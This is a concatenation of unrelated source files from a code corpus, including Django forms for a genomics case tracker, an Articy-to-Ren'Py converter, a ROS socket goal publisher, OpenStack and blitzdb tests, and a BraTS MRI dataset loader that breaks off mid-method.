class GELIRForm(forms.ModelForm):
'''
    Form used for allowing users to edit GEL interpretation report information
'''
class Meta:
model = GELInterpretationReport
fields = ['case_status', 'mdt_status', 'pilot_case', 'case_sent', 'no_primary_findings', 'case_code']
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.case_status = data['case_status']
gelir.mdt_status = data['mdt_status']
gelir.pilot_case = data['pilot_case']
gelir.case_sent = data['case_sent']
gelir.no_primary_findings = data['no_primary_findings']
gelir.case_code = data['case_code']
gelir.save(overwrite=True)
class RelativeForm(forms.ModelForm):
'''
    Form used for allowing users to edit Relative demographics
'''
class Meta:
model = Relative
fields = ['forename', 'surname', 'date_of_birth', 'nhs_number',
'sex', 'affected_status']
class DemogsForm(forms.ModelForm):
'''
    Form used for allowing users to edit proband demographics
'''
class Meta:
model = Proband
fields = ['nhs_number', 'lab_number', 'forename', 'surname', 'date_of_birth', 'sex', 'local_id', 'gmc']
class PanelForm(forms.Form):
'''
Form used for allowing users to add a panel to a proband
'''
panel = forms.ModelChoiceField(queryset=PanelVersion.objects.order_by('panel'))
class ClinicianForm(forms.Form):
'''
Form used for allowing users to change a probands clinician
'''
clinician = forms.ModelChoiceField(queryset=Clinician.objects.filter(added_by_user=True).order_by('name'))
class AddClinicianForm(forms.ModelForm):
'''
Form used in Proband View to allow users add a new Clinician
'''
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class Meta:
model = Clinician
fields = ['name', 'hospital', 'email']
class UserChoiceField(ModelChoiceField):
def label_from_instance(self, obj):
return "%s %s" % (obj.first_name, obj.last_name)
class CaseAssignForm(forms.ModelForm):
'''
Form for specifying which user a case is assigned to
'''
assigned_user = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["assigned_user"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.assigned_user = data['assigned_user']
gelir.save(overwrite=True)
class FirstCheckAssignForm(forms.ModelForm):
'''
Form for specifying which user performed the first check
'''
first_check = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["first_check"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.first_check = data['first_check']
gelir.save(overwrite=True)
class SecondCheckAssignForm(forms.ModelForm):
'''
Form for specifying which user performed the second check
'''
second_check = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["second_check"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.second_check = data['second_check']
gelir.save(overwrite=True)
class MdtForm(forms.ModelForm):
'''
Form which edits MDT instance specific fields such as date and status
'''
class Meta:
model = MDT
fields = ['description', 'date_of_mdt', 'status', 'sent_to_clinician']
class MdtSentToClinicianForm(forms.ModelForm):
'''
Form for recording the whether the MDT list has been sent to the clinician
'''
class Meta:
model = MDT
fields = ['sent_to_clinician']
def __init__(self, *args, **kwargs):
super(MdtSentToClinicianForm, self).__init__(*args, **kwargs)
self.fields['sent_to_clinician'].required = False
class ProbandMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in proband textfields
'''
class Meta:
model = Proband
fields = ('discussion', 'action')
widgets = {
'discussion': Textarea(attrs={'rows': '3'}),
'action': Textarea(attrs={'rows': '3'}),
}
class GELIRMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in proband textfields
'''
class Meta:
model = GELInterpretationReport
fields = ('case_status',)
def __init__(self, *args, **kwargs):
super(GELIRMDTForm, self).__init__(*args, **kwargs)
self.fields['case_status'].required = False
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.case_status = data['case_status']
gelir.save(overwrite=True)
class RareDiseaseMDTForm(forms.ModelForm):
'''
    Form used in Proband View at MDT which allows users to fill in exit questionnaire questions
'''
requires_validation = forms.ChoiceField(
choices=(
('U', 'Unknown'),
('A', 'Awaiting Validation'),
('K', 'Urgent Validation'),
('I', 'In Progress'),
('P', 'Passed Validation'),
('F', 'Failed Validation'),
('N', 'Not Required'),
)
)
class Meta:
model = RareDiseaseReport
fields = (
'contribution_to_phenotype', 'change_med',
'clinical_trial', 'requires_validation',
'discussion', 'action',
'inform_reproductive_choice', 'surgical_option',
'add_surveillance_for_relatives',
'classification', 'id',)
widgets = {
'id': HiddenInput(),
'surgical_option': CheckboxInput(),
'requires_validation': Select(),
'change_med': CheckboxInput(),
'add_surveillance_for_relatives': CheckboxInput(),
'clinical_trial': CheckboxInput(),
'inform_reproductive_choice': CheckboxInput(),
'discussion': Textarea(attrs={'rows': '4'}),
'action': Textarea(attrs={'rows': '4'})
}
def save(self, commit=True):
selected_validation_status = self.cleaned_data['requires_validation']
pv = self.instance.proband_variant
pv.validation_status = selected_validation_status
if not pv.validation_datetime_set:
pv.validation_datetime_set = datetime.now()
pv.save()
return super(RareDiseaseMDTForm, self).save(commit=commit)
class CancerMDTForm(forms.ModelForm):
'''
    Form used in Proband View at MDT which allows users to fill in exit questionnaire questions
'''
requires_validation = forms.ChoiceField(
choices=(
('U', 'Unknown'),
('A', 'Awaiting Validation'),
('K', 'Urgent Validation'),
('I', 'In Progress'),
('P', 'Passed Validation'),
('F', 'Failed Validation'),
('N', 'Not Required'),
)
)
class Meta:
model = CancerReport
fields = ('variant_use', 'action_type', 'validated',
'validated_assay_type',
'classification', 'id',)
widgets = {'id': HiddenInput(),
'validated': CheckboxInput(),
}
def save(self, commit=True):
selected_validation_status = self.cleaned_data['requires_validation']
pv = self.instance.proband_variant
pv.validation_status = selected_validation_status
if not pv.validation_datetime_set:
pv.validation_datetime_set = datetime.now()
pv.save()
return super(CancerMDTForm, self).save(commit=commit)
class AddNewAttendee(forms.Form):
'''
Form for allowing users to add new attendee which would then be inserted into CS, Clinician or OtherStaff table
'''
name = forms.CharField()
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
email = forms.EmailField()
role = forms.ChoiceField(choices=(('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff')))
class AddVariantForm(forms.ModelForm):
'''
Allows users to add a variant to a report. Users have to enter
chromosome, position, reference, alternate, dbsnp
    TODO should check everything the user enters for consistency
'''
def clean_reference(self):
data = self.cleaned_data['reference'].strip()
if not all([f in ['A', 'T', 'G', 'C'] for f in data]):
raise forms.ValidationError("Not DNA sequence")
else:
return data
def clean_alternate(self):
data = self.cleaned_data['alternate'].strip()
if not all([f in ['A', 'T', 'G', 'C'] for f in data]):
raise forms.ValidationError("Not DNA sequence")
else:
return data
class Meta:
model = Variant
fields = ['chromosome',
'position',
'reference',
'alternate',
'db_snp_id']
widgets = {'reference': Textarea(attrs={'rows': '2'}),
'alternate': Textarea(attrs={'rows': '2'})}
class GenomicsEnglandform(forms.Form):
""" Form for entering genomics england information to render a report to be used by the scientists """
interpretation_id = forms.IntegerField(label='Interpretation ID')
# Version number of the interpretation
ir_version = forms.IntegerField(label='Version')
report_version = forms.IntegerField(label='Clinical Report Version')
class GeneSearchForm(forms.Form):
gene = forms.CharField(max_length=25, widget = forms.TextInput(attrs={'style': 'width:200px'}))
class AddCaseAlert(forms.ModelForm):
def clean_gel_id(self):
if self.cleaned_data['gel_id'].isdigit() and len(self.cleaned_data['gel_id']) >= 8:
return self.cleaned_data['gel_id'].strip()
else:
            raise forms.ValidationError("Doesn't look like a GELID")
class Meta:
model = CaseAlert
fields = ['gel_id', 'comment', 'sample_type']
|
the-stack_0_6242 | import argparse
import json
from ArticyCoreClass import ArticyCore
from ArticyCoreClass import Character
from ArticyCoreClass import FlowFrag
from ArticyCoreClass import Episode
from ArticyCoreClass import Scene
from ArticyCoreClass import Dialog
from ArticyCoreClass import Condition
from ArticyCoreClass import Instruction
from ArticyCoreClass import Snippet
from ArticyCoreClass import Code
from ArticyCoreClass import Game
from ArticyCoreClass import Hub
parser = argparse.ArgumentParser(description='Convert the JSON file from Articy to a Renpy file')
parser.add_argument('-i', required=True, help='JSON file created by Articy (required)')
parser.add_argument('-o', required=False, help='Renpy file created from the JSON file')
args = parser.parse_args()
#print(args)
#print(args.i)
#-------------------------------------------------------------------------------
f = open(args.i)
data = json.load(f)
f.close()
TheGame: Game = None
Characters = []
FlowFrags = []
Episodes = []
Scenes = []
Dialogs = []
Conditions = []
Snippets = []
Codes = []
Instructions = []
Hubs = []
#-------------------------------------------------------------------------------
# parse the JSON file, building up internal data structures
for package in data['Packages']:
for model in package['Models']:
if model['Type']=='DialogueFragment':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
dialog = Dialog(properties['Id'], properties['Parent'], properties['MenuText'], properties['StageDirections'], properties['Speaker'], properties['Text'], outputs)
Dialogs.append(dialog)
elif model['Type']=='Instruction':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
instruction = Instruction(frag, properties['Expression'])
Instructions.append(instruction)
elif model['Type']=='Condition':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
condition = Condition(frag, properties['Expression'])
Conditions.append(condition)
elif model['Type']=='Hub':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
hub = Hub(frag, "hub")
Hubs.append(hub)
elif model['Type']=='DefaultMainCharacterTemplate_02':
properties = model['Properties']
color = properties['Color']
template = model['Template']
basic = template['DefaultBasicCharacterFeature_02']
colorR = round(255*color['r'])
colorG = round(255*color['g'])
colorB = round(255*color['b'])
char = Character(properties['Id'], properties['DisplayName'], (colorR, colorG, colorB), basic['AbreviatedName'])
Characters.append(char)
elif (model['Type']=='FlowFragment') or (model['Type']=='Dialogue'):
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
if 'Connections' in outputpin:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
FlowFrags.append(frag)
names = frag.Name.split()
if names[0].lower()[:7] == 'episode':
episode = Episode(frag)
Episodes.append(episode)
elif names[0].lower()[:5] == 'scene':
scene = Scene(frag)
Scenes.append(scene)
elif names[0].lower()[:7] == 'snippet':
scene = Snippet(frag)
Snippets.append(scene)
elif names[0].lower()[:4] == 'code':
scene = Code(frag)
Codes.append(scene)
elif names[0].lower()[:4] == 'game':
TheGame = Game(frag)
else:
print('Unhandled ???')
print(model['Type'])
print()
#-------------------------------------------------------------------------------
# For debug purposes, print out the data structures created from parsing the JSON file
print('Characters:')
Characters.sort(key=lambda character: character.Name)
for char in Characters:
print(char)
print()
print('FlowFrags:')
for frag in FlowFrags:
print(frag)
print()
print('Game:')
print(TheGame)
print()
print('Episodes:')
Episodes.sort(key=lambda episode: episode.Num)
for episode in Episodes:
print(episode)
print()
print('Scenes:')
Scenes.sort(key=lambda scene: scene.Num)
for scene in Scenes:
print(scene)
print()
print('Snippets:')
Snippets.sort(key=lambda snippet: snippet.Num)
for snippet in Snippets:
print(snippet)
print()
print('Dialogs:')
for dialog in Dialogs:
# if dialog.StageDirections == 'aurora smirks':
if dialog.StageDirections == 'art sad':
debug = 1
dialog.MakeConnections(Scenes, Characters, Dialogs, Conditions, Instructions, Codes, Snippets, Hubs)
for dialog in Dialogs:
print(dialog)
print()
def Connections(name, clist: []):
print(name+":")
for citem in clist:
citem.MakeConnections(Scenes, Dialogs, Conditions, Instructions, Codes, Snippets, Hubs)
print(citem)
print()
Connections('Conditions', Conditions)
Connections('Instructions', Instructions)
Connections('Code Blocks', Codes)
Connections('Snippets', Snippets)
Connections('Hubs', Hubs)
#-------------------------------------------------------------------------------
# Now translate the structures into a Ren'Py representation
TheGame.MakeLinkages(Episodes)
print(TheGame.Title())
episode = TheGame.First
while episode != None:
print(' ', episode.Title())
episode.MakeLinkages(Scenes)
scene = episode.First
while scene != None:
print(' ', f"({scene.Prefix()})", scene.Title())
scene = scene.Next()
print()
episode = episode.Next()
print()
for scene in Scenes:
scene.PrepareDialog(Dialogs, Snippets, Conditions, Instructions, Codes)
lines = scene.CreateRenpyScene()
if len(lines) > 0:
print(f"({scene.Prefix()}) {scene.Title()}")
print()
for line in lines:
print(line)
print()
for snippet in Snippets:
snippet.PrepareDialog(Dialogs, Snippets, Conditions, Instructions, Codes)
lines = snippet.CreateRenpyScene()
if len(lines) > 0:
print(f"({snippet.Prefix()}) {snippet.Title()}")
print()
for line in lines:
print(line)
print()
for scene in Scenes:
if len(scene.Images) > 0:
print(f"({scene.Prefix()}) {scene.Title()}")
for imagename in scene.Images:
print(imagename)
print()
for snippet in Snippets:
if len(snippet.Images) > 0:
print(f"({snippet.Prefix()}) {snippet.Title()}")
for imagename in snippet.Images:
print(imagename)
print()
print()
#-------------------------------------------------------------------------------
# write Ren'Py code out to the specified file
if args.o != None:
f = open(args.o, "w")
# The code files
for scene in Scenes:
lines = scene.CreateRenpyScene()
if len(lines) > 0:
for line in lines:
f.write(f"{line}\n")
f.write("\n")
for snippet in Snippets:
lines = snippet.CreateRenpyScene()
if len(lines) > 0:
for line in lines:
f.write(f"{line}\n")
f.write("\n")
# List out the images needed
for scene in Scenes:
if len(scene.Images) > 0:
for imagename in scene.Images:
f.write(f"{imagename}\n")
f.write("\n")
for snippet in Snippets:
if len(snippet.Images) > 0:
for imagename in snippet.Images:
f.write(f"{imagename}\n")
f.write("\n")
f.close()
|
the-stack_0_6244 | from typing import Optional
from numbers import Number
import numpy as np
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
__all__ = [
'plot',
]
def plot(
df: pd.DataFrame,
*args,
zmin: Optional[Number] = None,
zmax: Optional[Number] = None,
**kwargs,
) -> go.Figure:
if zmin is None:
zmin = -1
if zmax is None:
zmax = 1
return px.imshow(get_lower_correlation_matrix(df), *args, zmin=zmin, zmax=zmax, **kwargs)
def get_lower_correlation_matrix(df: pd.DataFrame) -> pd.DataFrame:
correlation = df.corr()
return correlation.where(np.tril(np.ones(correlation.shape), k=-1).astype(bool))
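# Minimal usage sketch (assumed toy data, not part of the original module):
#   df = pd.DataFrame({'a': [1, 2, 3], 'b': [2, 4, 6], 'c': [3, 1, 2]})
#   plot(df).show()   # lower-triangular correlation heatmap on a -1..1 scale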
|
the-stack_0_6245 | import pytest
from sqlalchemy.exc import IntegrityError
from blitzdb import Document
from blitzdb.fields import CharField, ForeignKeyField, ManyToManyField
from ..conftest import _sql_backend, get_sql_engine
class DirectorAward(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
director = ForeignKeyField('Director', backref='awards')
class Actor(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
class Movie(Document):
class Meta(Document.Meta):
autoregister = False
director = ForeignKeyField('Director', backref='movies')
actors = ManyToManyField('Actor', backref='movies')
name = CharField(indexed=True)
class Director(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
def _init_backend(backend):
backend.register(Actor)
backend.register(Movie)
backend.register(Director)
backend.register(DirectorAward)
backend.init_schema()
backend.create_schema()
ted_kotcheff = Director({'name': 'Ted Kotcheff'})
silvester_stallone = Actor({'name': 'Silvester Stallone'})
rambo = Movie({'name': 'Rambo I', 'actors': [silvester_stallone], 'director': ted_kotcheff})
oscar = DirectorAward({'name': 'Oscar', 'director': ted_kotcheff})
with backend.transaction():
backend.save(rambo)
backend.save(oscar)
@pytest.fixture
def cascade_backend(request):
engine = get_sql_engine()
backend = _sql_backend(request, engine, autodiscover_classes=False, ondelete='CASCADE')
_init_backend(backend)
return backend
@pytest.fixture
def nocascade_backend(request):
engine = get_sql_engine()
backend = _sql_backend(request, engine, autodiscover_classes=False, ondelete=None)
_init_backend(backend)
return backend
def test_foreign_key_delete_cascade(cascade_backend):
movie = cascade_backend.get(Movie, {})
director = cascade_backend.get(Director, {})
director.delete()
assert cascade_backend.filter(Actor, {})
assert not cascade_backend.filter(Director, {})
assert not cascade_backend.filter(Movie, {})
assert not cascade_backend.filter(DirectorAward, {})
def test_foreign_key_delete_nocascade(nocascade_backend):
movie = nocascade_backend.get(Movie, {})
actor = nocascade_backend.get(Actor, {})
director = nocascade_backend.get(Director, {})
with pytest.raises(IntegrityError):
director.delete()
assert actor in nocascade_backend.filter(Actor, {})
assert director in nocascade_backend.filter(Director, {})
assert movie in nocascade_backend.filter(Movie, {})
def test_many_to_many_delete_cascade(cascade_backend):
movie = cascade_backend.get(Movie, {})
actor = cascade_backend.get(Actor, {})
actor.delete()
assert not cascade_backend.filter(Actor, {})
assert cascade_backend.filter(Movie, {})
def test_many_to_many_delete_nocascade(nocascade_backend):
movie = nocascade_backend.get(Movie, {})
actor = nocascade_backend.get(Actor, {})
director = nocascade_backend.get(Director, {})
with pytest.raises(IntegrityError):
actor.delete()
assert actor in nocascade_backend.filter(Actor, {})
assert director in nocascade_backend.filter(Director, {})
assert movie in nocascade_backend.filter(Movie, {})
|
the-stack_0_6249 | #!/usr/bin/env python
import socket
import sys
import rospy
from geometry_msgs.msg import Pose2D
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = ('10.103.118.91', 8000)
print >>sys.stderr, 'starting up on %s port %s' % server_address
sock.bind(server_address)
# Listen for incoming connections
sock.listen(1)
pub = rospy.Publisher('/nav_goal', Pose2D, queue_size=10)
rospy.init_node('goal_publisher', anonymous=True)
rate = rospy.Rate(100) # 100hz
"""
starting up on 10.103.118.91 port 8000
waiting for a connection
connection from ('10.103.95.125', 43562)
received "{ "skill_name" : "Go_to","location": "water"}"
sending data back to the client
received ""
no more data from ('10.103.95.125', 43562)
waiting for a connection
"""
named_locations = {"door" : [-1, -1, 0], "water": [-2, -7, 0], "middle": [-1.5, -3, 0]}
def get_position_from_name(name):
try:
return named_locations[name.strip().lower()]
    except KeyError:
return None
while True:
# Wait for a connection
print >>sys.stderr, 'waiting for a connection'
connection, client_address = sock.accept()
try:
print >>sys.stderr, 'connection from', client_address
# Receive the data in small chunks and retransmit it
while True:
data = connection.recv(4000)
if data:
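                # Parse the target name out of the JSON-ish payload shown in the
                # sample session above, e.g. '{ "skill_name" : "Go_to","location": "water"}'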
name = data.split('"location": ')[1].replace("}", "").replace('"', '').strip()
print(name)
pos = get_position_from_name(name)
if pos is not None:
for _ in range(10):
pub.publish(*pos)
else:
print >>sys.stderr, 'no more data from', client_address
break
finally:
# Clean up the connection
connection.close() |
the-stack_0_6250 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from tempest.api.object_storage import base
from tempest.common.utils.data_utils import rand_name
from tempest import exceptions
from tempest.test import attr
from tempest.test import HTTP_SUCCESS
class AccountTest(base.BaseObjectTest):
@classmethod
def setUpClass(cls):
super(AccountTest, cls).setUpClass()
cls.containers = []
for i in xrange(ord('a'), ord('f') + 1):
name = rand_name(name='%s-' % chr(i))
cls.container_client.create_container(name)
cls.containers.append(name)
cls.containers_count = len(cls.containers)
@classmethod
def tearDownClass(cls):
cls.delete_containers(cls.containers)
super(AccountTest, cls).tearDownClass()
@attr(type='smoke')
def test_list_containers(self):
# list of all containers should not be empty
params = {'format': 'json'}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertIsNotNone(container_list)
container_names = [c['name'] for c in container_list]
for container_name in self.containers:
self.assertIn(container_name, container_names)
@attr(type='smoke')
def test_list_containers_with_limit(self):
        # list one container, then half of the containers, then all of them
for limit in (1, self.containers_count / 2, self.containers_count):
params = {'limit': limit}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), limit)
@attr(type='smoke')
def test_list_containers_with_marker(self):
# list containers using marker param
        # first expect to get 0 containers as we specified the last
        # container as the marker
# second expect to get the bottom half of the containers
params = {'marker': self.containers[-1]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), 0)
params = {'marker': self.containers[self.containers_count / 2]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), self.containers_count / 2 - 1)
@attr(type='smoke')
def test_list_containers_with_end_marker(self):
# list containers using end_marker param
        # first expect to get 0 containers as we specified the first
        # container as the end_marker
# second expect to get the top half of the containers
params = {'end_marker': self.containers[0]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), 0)
params = {'end_marker': self.containers[self.containers_count / 2]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), self.containers_count / 2)
@attr(type='smoke')
def test_list_containers_with_limit_and_marker(self):
        # list containers combining marker and limit params
        # results are always limited by the limit whatever the marker
        for marker in random.sample(self.containers, self.containers_count / 2):
limit = random.randint(0, self.containers_count - 1)
params = {'marker': marker,
'limit': limit}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertLessEqual(len(container_list), limit)
@attr(type='smoke')
def test_list_account_metadata(self):
# list all account metadata
resp, metadata = self.account_client.list_account_metadata()
self.assertIn(int(resp['status']), HTTP_SUCCESS)
self.assertIn('x-account-object-count', resp)
self.assertIn('x-account-container-count', resp)
self.assertIn('x-account-bytes-used', resp)
@attr(type='smoke')
def test_create_and_delete_account_metadata(self):
header = 'test-account-meta'
data = 'Meta!'
# add metadata to account
resp, _ = self.account_client.create_account_metadata(
metadata={header: data})
self.assertIn(int(resp['status']), HTTP_SUCCESS)
resp, _ = self.account_client.list_account_metadata()
self.assertIn('x-account-meta-' + header, resp)
self.assertEqual(resp['x-account-meta-' + header], data)
# delete metadata from account
resp, _ = \
self.account_client.delete_account_metadata(metadata=[header])
self.assertIn(int(resp['status']), HTTP_SUCCESS)
resp, _ = self.account_client.list_account_metadata()
self.assertNotIn('x-account-meta-' + header, resp)
@attr(type=['negative', 'gate'])
def test_list_containers_with_non_authorized_user(self):
# list containers using non-authorized user
# create user
self.data.setup_test_user()
resp, body = \
self.token_client.auth(self.data.test_user,
self.data.test_password,
self.data.test_tenant)
new_token = \
self.token_client.get_token(self.data.test_user,
self.data.test_password,
self.data.test_tenant)
custom_headers = {'X-Auth-Token': new_token}
params = {'format': 'json'}
# list containers with non-authorized user token
self.assertRaises(exceptions.Unauthorized,
self.custom_account_client.list_account_containers,
params=params, metadata=custom_headers)
# delete the user which was created
self.data.teardown_all()
|
the-stack_0_6251 | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
class TestConnection(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.dns.connection import Connection
return Connection
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_build_api_url_no_extra_query_params(self):
conn = self._makeOne()
URI = '/'.join([
conn.API_BASE_URL,
'dns',
conn.API_VERSION,
'foo',
])
self.assertEqual(conn.build_api_url('/foo'), URI)
def test_build_api_url_w_extra_query_params(self):
from six.moves.urllib.parse import parse_qsl
from six.moves.urllib.parse import urlsplit
conn = self._makeOne()
uri = conn.build_api_url('/foo', {'bar': 'baz'})
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual('%s://%s' % (scheme, netloc), conn.API_BASE_URL)
self.assertEqual(path,
'/'.join(['', 'dns', conn.API_VERSION, 'foo']))
parms = dict(parse_qsl(qs))
self.assertEqual(parms['bar'], 'baz')
|
the-stack_0_6253 | import os
import torch
import numpy as np
import SimpleITK as sitk
import random
from torch.utils.data import Dataset
class BraTS(Dataset):
def __init__(self, root, phase, desired_depth=128, desired_height=160, desired_width=192, normalize_flag=True,
scale_intensity_flag=False, shift_intesity_flag=False, flip_axes_flag=False):
self.root = root
self.patients = os.listdir(self.root)
self.patients = [x for x in self.patients if x.startswith('BraTS')]
self.flair_suffix = "_flair.nii.gz"
self.t1_suffix = "_t1.nii.gz"
self.t1ce_suffix = "_t1ce.nii.gz"
self.t2_suffix = "_t2.nii.gz"
self.seg_suffix = "_seg.nii.gz"
self.wt_suffix = "_contour_wt.nii.gz"
self.tc_suffix = "_contour_tc.nii.gz"
self.et_suffix = "_contour_et.nii.gz"
self.phase = phase
self.desired_depth = desired_depth
self.desired_height = desired_height
self.desired_width = desired_width
self.normalize_flag = normalize_flag
self.scale_intensity_flag = scale_intensity_flag
self.shift_intensity_flag = shift_intesity_flag
self.flip_axes_flag = flip_axes_flag
def __len__(self):
return len(self.patients)
def __getitem__(self, idx):
patient = self.patients[idx]
path_flair = os.path.join(self.root, patient, patient + self.flair_suffix)
path_t1 = os.path.join(self.root, patient, patient + self.t1_suffix)
path_t2 = os.path.join(self.root, patient, patient + self.t2_suffix)
path_t1ce = os.path.join(self.root, patient, patient + self.t1ce_suffix)
path_seg = os.path.join(self.root, patient, patient + self.seg_suffix)
path_contour_wt = os.path.join(self.root, patient, patient + self.wt_suffix)
path_contour_tc = os.path.join(self.root, patient, patient + self.tc_suffix)
path_contour_et = os.path.join(self.root, patient, patient + self.et_suffix)
mask, start_depth, start_height, start_width = self.get_mask_simple(path_seg)
out = self.get_volume(path_flair, path_t1, path_t2, path_t1ce, start_depth,
start_height, start_width)
contours = self.get_contours(path_contour_wt, path_contour_tc, path_contour_et, start_depth, start_height, start_width)
if self.flip_axes_flag:
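            # random flip augmentation: keep the volume unchanged with
            # probability 0.5, otherwise apply one of five axis-flip
            # combinations (about 10% each) to image, mask and contours alike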
dice = random.uniform(0, 1)
if dice > 0.5 and dice < 0.6:
mask = mask[:, ::-1, : , :].copy()
out = out[:, ::-1, : , :].copy()
contours = contours[:, ::-1, : , :].copy()
elif dice > 0.6 and dice < 0.7:
mask = mask[:, :, ::-1 , :].copy()
out = out[:, :, ::-1 , :].copy()
contours = contours[:, :, ::-1 , :].copy()
elif dice > 0.7 and dice < 0.8:
mask = mask[:, :, : , ::-1].copy()
out = out[:, :, : , ::-1].copy()
contours = contours[:, :, : , ::-1].copy()
elif dice > 0.8 and dice < 0.9:
mask = mask[:, :, ::-1 , ::-1].copy()
out = out[:, :, ::-1 , ::-1].copy()
contours = contours[:, :, ::-1 , ::-1].copy()
elif dice > 0.9 and dice < 1:
mask = mask[:, ::-1, ::-1 , ::-1].copy()
out = out[:, ::-1, ::-1 , ::-1].copy()
contours = contours[:, ::-1, ::-1 , ::-1].copy()
return torch.FloatTensor(out), torch.FloatTensor(mask), torch.FloatTensor(contours), patient
def get_contours(self, path_contour_wt, path_contour_tc, path_contour_et, start_depth, start_height, start_width):
depth = self.desired_depth
height = self.desired_height
width = self.desired_width
try:
contour_wt = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_wt))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
            return np.zeros((3, self.desired_depth, self.desired_height, self.desired_width))
try:
contour_tc = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_tc))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
            return np.zeros((3, self.desired_depth, self.desired_height, self.desired_width))
try:
contour_et = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_et))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
            return np.zeros((3, self.desired_depth, self.desired_height, self.desired_width))
return np.stack((contour_wt, contour_tc, contour_et))
def normalize_one_volume(self, volume):
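        # z-score normalization computed only over the non-zero (brain)
        # voxels, leaving the zero background untouched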
new_volume = np.zeros(volume.shape)
location = np.where(volume != 0)
mean = np.mean(volume[location])
var = np.std(volume[location])
new_volume[location] = (volume[location] - mean) / var
return new_volume
def merge_volumes(self, *volumes):
return np.stack(volumes, axis=0)
def shift_intensity(self, volume):
location = np.where(volume != 0)
minimum = np.min(volume[location])
maximum = np.max(volume[location])
std = np.std(volume[location])
value = np.random.uniform(low=-0.1 * std, high=0.1 * std, size=1)
volume[location] += value
        # fancy indexing with `location` returns a copy, so the clipped values
        # must be assigned back into the original volume
        volume[location] = np.clip(volume[location], minimum, maximum)
return volume
def scale_intensity(self, volume):
location = np.where(volume != 0)
new_volume = np.zeros(volume.shape)
IntensityScale = np.random.uniform(0.9, 1, 1)
new_volume[location] = volume[location] * IntensityScale
return new_volume
def crop_volume(self, volume, start_depth, start_height, start_width):
### initial volumes are 155 X 240 X 240
